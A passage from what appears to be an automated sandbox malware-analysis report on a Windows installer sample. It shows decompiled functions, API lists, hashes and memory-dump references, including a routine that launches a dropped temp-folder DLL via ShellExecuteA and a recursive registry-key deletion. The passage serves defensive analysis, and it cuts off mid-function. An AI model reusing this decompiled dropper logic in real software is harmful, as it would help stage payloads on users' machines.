                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll
                                                                          • API String ID: 2621199633-3410690208
                                                                          • Opcode ID: 39be9a3ed13df2c1dc0a7def94e95ebcbb8ca7a0b25094b5a643ed618163fea6
                                                                          • Instruction ID: 9f433403dff5527e04f0e9ab7737a20a855248c0a7a5ae3549be26796f1196a1
                                                                          • Opcode Fuzzy Hash: 39be9a3ed13df2c1dc0a7def94e95ebcbb8ca7a0b25094b5a643ed618163fea6
                                                                          • Instruction Fuzzy Hash: 5A117072904215FBCF016FA2CD4999E7A61EF103A8F10423BF501751E1DA7D8A91AF9E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404643, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404643(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                          0x00404651
                                                                          0x0040465e
                                                                          0x00404664
                                                                          0x004046a2
                                                                          0x004046a2
                                                                          0x004046b1
                                                                          0x004046b8
                                                                          0x00000000
                                                                          0x004046ba
                                                                          0x00404666
                                                                          0x00404675
                                                                          0x0040467d
                                                                          0x00404680
                                                                          0x00404692
                                                                          0x00404698
                                                                          0x0040469f
                                                                          0x00000000
                                                                          0x0040469f
                                                                          0x00000000

                                                                          APIs
                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040465E
                                                                          • GetMessagePos.USER32 ref: 00404666
                                                                          • ScreenToClient.USER32 ref: 00404680
                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404692
                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004046B8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Message$Send$ClientScreen
                                                                          • String ID: f
                                                                          • API String ID: 41195575-1993550816
                                                                          • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                          • Instruction ID: c161ae2f8e6b182b0fd34984c2a0c6d9d452551e98057f29495dc0983078c510
                                                                          • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                          • Instruction Fuzzy Hash: A7019E71D00218BADB00DBA4CC81BFFBBBCAB45711F10412BBB00F62C0D3B8A9418BA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402BAB, Relevance: 9.0, APIs: 6, Instructions: 48timeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
				int _t7;
				int _t15;
				struct HWND__* _t16;

				_t16 = _a4;
				if(_a8 == 0x110) {
					SetTimer(_t16, 1, 0xfa, 0);
					_a8 = 0x113;
					 *0x40b048 = _a16;
				}
				if(_a8 == 0x113) {
					_t15 =  *0x414c50; // 0x7c00
					_t7 =  *0x428c58;
					if(_t15 >= _t7) {
						_t15 = _t7;
					}
					wsprintfA(0x414c10,  *0x40b048, MulDiv(_t15, 0x64, _t7));
					SetWindowTextA(_t16, 0x414c10);
					SetDlgItemTextA(_t16, 0x406, 0x414c10);
					ShowWindow(_t16, 5);
				}
				return 0;
			}






                                                                          0x00402bb7
                                                                          0x00402bbf
                                                                          0x00402bcb
                                                                          0x00402bd4
                                                                          0x00402bd7
                                                                          0x00402bd7
                                                                          0x00402bdf
                                                                          0x00402be1
                                                                          0x00402be7
                                                                          0x00402bee
                                                                          0x00402bf0
                                                                          0x00402bf0
                                                                          0x00402c09
                                                                          0x00402c14
                                                                          0x00402c21
                                                                          0x00402c29
                                                                          0x00402c29
                                                                          0x00402c34

                                                                          APIs
                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
                                                                          • MulDiv.KERNEL32(00007C00,00000064,?), ref: 00402BF6
                                                                          • wsprintfA.USER32 ref: 00402C09
                                                                          • SetWindowTextA.USER32(?,00414C10), ref: 00402C14
                                                                          • SetDlgItemTextA.USER32 ref: 00402C21
                                                                          • ShowWindow.USER32(?,00000005,?,00000406,00414C10), ref: 00402C29
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: TextWindow$ItemShowTimerwsprintf
                                                                          • String ID:
                                                                          • API String ID: 559026099-0
                                                                          • Opcode ID: 1bf024436dbc0d01cb52e4f76fdb7ff34a3bb134a71d5a22670ee3ec0b6572fb
                                                                          • Instruction ID: da11a6cf77eab8a7fe7ea890cfaf0f22c23191f336b5e04c96ce70fa4cb2a612
                                                                          • Opcode Fuzzy Hash: 1bf024436dbc0d01cb52e4f76fdb7ff34a3bb134a71d5a22670ee3ec0b6572fb
                                                                          • Instruction Fuzzy Hash: 7501B570600214ABD7215F15AD09FEF3B68EB45721F00843AFA05BA2D0DBB864509BA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401E34, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 64%
                                                                          			E00401E34() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A9A(_t19);
				_t20 = E00402A9A(0x31);
				_t7 = E00402A9A(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\hardz\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll", "%s %s");
				E00401428(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}








                                                                          0x00401e3c
                                                                          0x00401e45
                                                                          0x00401e47
                                                                          0x00401e4c
                                                                          0x00401e4d
                                                                          0x00401e58
                                                                          0x00401e5a
                                                                          0x00401e65
                                                                          0x00401e71
                                                                          0x00401e7f
                                                                          0x00401e91
                                                                          0x004026da
                                                                          0x004026da
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • wsprintfA.USER32 ref: 00401E5A
                                                                          • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
                                                                          Strings
                                                                          • %s %s, xrefs: 00401E4E
                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
                                                                          • C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll, xrefs: 00401E53
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ExecuteShellwsprintf
                                                                          • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll
                                                                          • API String ID: 2956387742-1378224534
                                                                          • Opcode ID: 325ce4e6db7db2d43a24a0a054918743e22d24fe983c8af644ce1b1221345b66
                                                                          • Instruction ID: d9aa26d169122715fb4d9242c6ec18ca088ab24489bb6374a4c731177bc8625c
                                                                          • Opcode Fuzzy Hash: 325ce4e6db7db2d43a24a0a054918743e22d24fe983c8af644ce1b1221345b66
                                                                          • Instruction Fuzzy Hash: 90F0F471B04200AEC711ABB59D4AF6E3AA8DB11319F200837F001F61D3D5BD88519768
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402ADA, Relevance: 7.6, APIs: 5, Instructions: 51registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t14;

				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
				if(_t14 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						if(E00402ADA(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					return RegDeleteKeyA(_a4, _a8);
				}
				return _t14;
			}






                                                                          0x00402af5
                                                                          0x00402afd
                                                                          0x00402b25
                                                                          0x00402b0f
                                                                          0x00402b56
                                                                          0x00000000
                                                                          0x00402b5e
                                                                          0x00402b23
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402b23
                                                                          0x00402b3a
                                                                          0x00000000
                                                                          0x00402b46
                                                                          0x00402b50

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B3A
                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B56
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Close$DeleteEnumOpen
                                                                          • String ID:
                                                                          • API String ID: 1912718029-0
                                                                          • Opcode ID: 781eaa9db69f21ef601ca1d4776a4c1391036b525708d9e88c61fa299770da92
                                                                          • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
                                                                          • Opcode Fuzzy Hash: 781eaa9db69f21ef601ca1d4776a4c1391036b525708d9e88c61fa299770da92
                                                                          • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401D32, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00401D32() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
				GetClientRect(_t25, _t27 - 0x40);
				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                          0x00401d3e
                                                                          0x00401d45
                                                                          0x00401d74
                                                                          0x00401d7c
                                                                          0x00401d83
                                                                          0x00401d83
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • GetDlgItem.USER32 ref: 00401D38
                                                                          • GetClientRect.USER32 ref: 00401D45
                                                                          • LoadImageA.USER32 ref: 00401D66
                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
                                                                          • DeleteObject.GDI32(00000000), ref: 00401D83
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                          • String ID:
                                                                          • API String ID: 1849352358-0
                                                                          • Opcode ID: 5da6e5cd00a1277bc603e5448242defb56d1d49a981dc3d01ba33d8312d7bfb7
                                                                          • Instruction ID: 273f5d2522af92408d9d707f912642cc01ca42a216635a10685a7a38cf896988
                                                                          • Opcode Fuzzy Hash: 5da6e5cd00a1277bc603e5448242defb56d1d49a981dc3d01ba33d8312d7bfb7
                                                                          • Instruction Fuzzy Hash: 78F0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105476F601F2191C7789D418B69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040557B, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0040557B(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405331
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405513(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                                                          0x00405584
                                                                          0x00405584
                                                                          0x0040558b
                                                                          0x0040558e
                                                                          0x00405593
                                                                          0x004055a6
                                                                          0x004055c0
                                                                          0x00000000
                                                                          0x004055c0
                                                                          0x004055aa
                                                                          0x004055ab
                                                                          0x004055ae
                                                                          0x004055af
                                                                          0x004055b7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004055b9
                                                                          0x004055bc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004055bc
                                                                          0x00000000
                                                                          0x0040559c
                                                                          0x00000000
                                                                          0x0040559d

                                                                          APIs
                                                                          • CharNextA.USER32(1S@,?,0042BCA8,C:\Users\user\AppData\Local\Temp\,004055DF,0042BCA8,0042BCA8,?,?,00000000,00405331,?,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,00000000), ref: 00405589
                                                                          • CharNextA.USER32(00000000), ref: 0040558E
                                                                          • CharNextA.USER32(00000000), ref: 0040559D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CharNext
                                                                          • String ID: 1S@$C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 3213498283-4152589723
                                                                          • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                          • Instruction ID: a38fbd83576ea772fbec08ada66f215e8512e3b4ef80e4756add6815f90ed6c2
                                                                          • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                          • Instruction Fuzzy Hash: 24F0A791A14F217EEB3262644C44B6B5FEDDB95720F140477E241B61D5D3BC4C42CFAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404561, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 35%
                                                                          			E00404561(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059FD(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059FD(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059FD(_t34, 0, 0x42a8a0, 0x42a8a0, _a8);
				wsprintfA(_t26 + lstrlenA(0x42a8a0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a8a0);
			}













                                                                          0x00404569
                                                                          0x0040456d
                                                                          0x00404575
                                                                          0x00404578
                                                                          0x00404579
                                                                          0x0040457b
                                                                          0x0040457d
                                                                          0x00404580
                                                                          0x00404580
                                                                          0x00404587
                                                                          0x0040458d
                                                                          0x0040458d
                                                                          0x00404594
                                                                          0x0040459f
                                                                          0x004045a0
                                                                          0x004045a3
                                                                          0x004045a3
                                                                          0x004045b0
                                                                          0x004045bb
                                                                          0x004045be
                                                                          0x004045d0
                                                                          0x004045d7
                                                                          0x004045d8
                                                                          0x004045e7
                                                                          0x004045f7
                                                                          0x00404613

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0042A8A0,0042A8A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404481,000000DF,?,00000000,00000400), ref: 004045EF
                                                                          • wsprintfA.USER32 ref: 004045F7
                                                                          • SetDlgItemTextA.USER32 ref: 0040460A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                          • String ID: %u.%u%s%s
                                                                          • API String ID: 3540041739-3551169577
                                                                          • Opcode ID: 55c911bb95cf7588d6af741ae256193dafe342a2ef030f34ff05c61eeb47f464
                                                                          • Instruction ID: a11c77c1d28780ca16a25841ba49bfe078be5d3d3c6fb1a2dd9ec20d76d43e14
                                                                          • Opcode Fuzzy Hash: 55c911bb95cf7588d6af741ae256193dafe342a2ef030f34ff05c61eeb47f464
                                                                          • Instruction Fuzzy Hash: 1B110473A001387BDB00666D9C46EAF365DCBC6334F14023BFA25F61D1E9788C1296A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401C19, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 54%
                                                                          			E00401C19(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A9A(0x33);
				 *(_t58 + 8) = E00402A9A(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405952(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405952(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A9A();
					_t30 = E00402A9A();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A7D();
					_t39 = E00402A7D();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x34) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x34));
					E00405939();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}













                                                                          0x00401c19
                                                                          0x00401c22
                                                                          0x00401c2e
                                                                          0x00401c31
                                                                          0x00401c3b
                                                                          0x00401c3b
                                                                          0x00401c3e
                                                                          0x00401c42
                                                                          0x00401c4c
                                                                          0x00401c4c
                                                                          0x00401c4f
                                                                          0x00401c53
                                                                          0x00401c55
                                                                          0x00401ca2
                                                                          0x00401ca4
                                                                          0x00401cad
                                                                          0x00401cb5
                                                                          0x00401cb8
                                                                          0x00401cb8
                                                                          0x00401cc1
                                                                          0x00000000
                                                                          0x00401c57
                                                                          0x00401c5e
                                                                          0x00401c60
                                                                          0x00401c68
                                                                          0x00401c6b
                                                                          0x00401c93
                                                                          0x00401cc7
                                                                          0x00401cc7
                                                                          0x00401c6d
                                                                          0x00401c7b
                                                                          0x00401c83
                                                                          0x00401c86
                                                                          0x00401c86
                                                                          0x00401c6b
                                                                          0x00401cca
                                                                          0x00401ccd
                                                                          0x00401cd3
                                                                          0x004028d7
                                                                          0x004028d7
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$Timeout
                                                                          • String ID: !
                                                                          • API String ID: 1777923405-2657877971
                                                                          • Opcode ID: bdb3484cc01cc4fd924d1c2f7cd2782c3e3dde487251ead39a63a2e7085da7fd
                                                                          • Instruction ID: 16c78498dd1c2a75f25d2486059e8ad8e4f8cfcc0dd16789622c6010fc6d5132
                                                                          • Opcode Fuzzy Hash: bdb3484cc01cc4fd924d1c2f7cd2782c3e3dde487251ead39a63a2e7085da7fd
                                                                          • Instruction Fuzzy Hash: 0321A171A44209BEEF01AFB0CD4AAED7FB1EF44304F10443AF501BA1E1D7B98A519B18
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401E9C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 83%
                                                                          			E00401E9C() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A9A(_t24);
				E00404D7E(0xffffffeb, _t13);
				_t15 = E00405263(_t28, "C:\\Users\\hardz\\AppData\\Local\\Temp");
